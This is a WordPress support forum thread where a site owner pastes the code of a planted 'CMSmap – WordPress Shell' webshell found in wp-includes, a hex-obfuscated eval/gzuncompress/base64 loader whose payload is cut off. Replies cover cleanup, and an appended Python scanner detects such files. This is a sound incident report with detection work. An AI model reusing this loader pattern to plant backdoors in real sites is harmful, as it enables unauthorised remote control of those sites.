Support » Plugin: Frontend Publishing » File appears to be malicious wp-includes/css/css.php

  • Resolved madhu patidar

    (@madhu-patidar)


    Hi,

    After scanning my site with the Wordfence plugin, I’m getting a message saying ‘../wp-includes/css/css.php’ and ‘../wp-includes/css/wp-config.php’ contain malicious code.

    Both of the above files contain the code below, and I don’t have this plugin “CMSmap – WordPress Shell”.

    “<?php
    /**
    * Plugin Name: CMSmap – WordPress Shell
    * Plugin URI: https://github.com/m7x/cmsmap/
    * Description: Simple WordPress Shell – Usage of CMSmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developer assumes no liability and is not responsible for any misuse or damage caused by this program.
    * Version: 1.0
    * Author: CMSmap
    * Author URI: https://github.com/m7x/cmsmap/
    * License: GPLv2
    */
    ?>
    <?php
    $password=’123456′;
    $shellname=’123456′;
    $myurl=null;
    error_reporting(0);
    @set_time_limit(0);
    function Class_UC_key($string){
    $array = strlen (trim($string));
    $debuger = ”;
    for($one = 0;$one < $array;$one+=2) {
    $debuger .= pack (“C”,hexdec (substr ($string,$one,2)));
    }
    return $debuger;
    }
    header(“content-Type: text/html; charset=gb2312”);
    $filename=Class_UC_key(“2470617373776F72643D27”).$password.
    Class_UC_key(“273B247368656C6C6E616D653D27”).$Username.
    Class_UC_key(“273B246D7975726C3D27”).$Url.
    Class_UC_key(“273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827″).’eJzsJ ………….. Y8f8Dk7fBIg==\’)));’;
    $PHP=Create_Function(”,$filename);$PHP();?>”

    I deleted these files, but then they automatically re-create themselves?

    Any ideas please?

    • This topic was modified 4 months, 4 weeks ago by madhu patidar.
  • Plugin Author Hassan Akhtar

    (@khaxan)

    The contents of those files are supposed to be different from what you’re seeing. You may have malware on your site that is changing the files. Please try deleting the plugin and installing a fresh copy. If that doesn’t work you may have to try a professional malware removal service.

    OK, thanks for the reply.

    I didn’t find that issue, but… I replaced all plugins with my local copies and also replaced the wp-admin and wp-includes folders with fresh WordPress folders.

    Now it’s not showing that malicious code.
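
As an added example (not part of the thread, and not Wordfence's or the plugin's code), here is a small Python scanner for the pattern in the file quoted in the first post: the `CMSmap` header, `create_function`, and PHP calls hidden inside hex string literals. The function names and marker lists are choices made for this example, and it assumes a stock wp-includes/css directory holds no PHP files.

```python
import re
import sys
from pathlib import Path

# Quoted runs of hex digits, as passed to the decoder helper in the quoted file.
HEX_LITERAL = re.compile(r"""["']([0-9A-Fa-f]{16,})["']""")
# PHP calls that have no reason to be hex-encoded in a WordPress file.
HIDDEN_CALLS = ("eval(", "base64_decode(", "gzuncompress(", "gzinflate(", "assert(")
# Plain-text markers taken from the file quoted in the post.
PLAIN_MARKERS = ("CMSmap", "create_function(")

def decode_hex_literals(source):
    """Return the text hidden in every even-length hex string literal."""
    decoded = []
    for match in HEX_LITERAL.finditer(source):
        digits = match.group(1)
        if len(digits) % 2 == 0:
            decoded.append(bytes.fromhex(digits).decode("latin-1"))
    return decoded

def findings_for(source):
    """List the reasons a PHP source text resembles the quoted file."""
    lowered = source.lower()
    reasons = [f"plain marker: {m}" for m in PLAIN_MARKERS if m.lower() in lowered]
    for text in decode_hex_literals(source):
        reasons += [f"hex-encoded call: {c}" for c in HIDDEN_CALLS if c in text.lower()]
    return reasons

def scan_tree(root):
    """Map each suspicious *.php file under root to its findings."""
    report = {}
    for path in Path(root).rglob("*.php"):
        reasons = findings_for(path.read_text(encoding="utf-8", errors="replace"))
        # Assumption: core ships only stylesheets here, so any PHP file is suspect.
        if path.parent.name == "css" and path.parent.parent.name == "wp-includes":
            reasons.append("PHP file inside wp-includes/css")
        if reasons:
            report[str(path)] = reasons
    return report

if __name__ == "__main__":
    for path, reasons in scan_tree(sys.argv[1]).items():
        print(path, "->", "; ".join(reasons))
```

Files that come back after deletion mean something else in the install is still writing them, so point the scan at the whole site root rather than only wp-includes.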
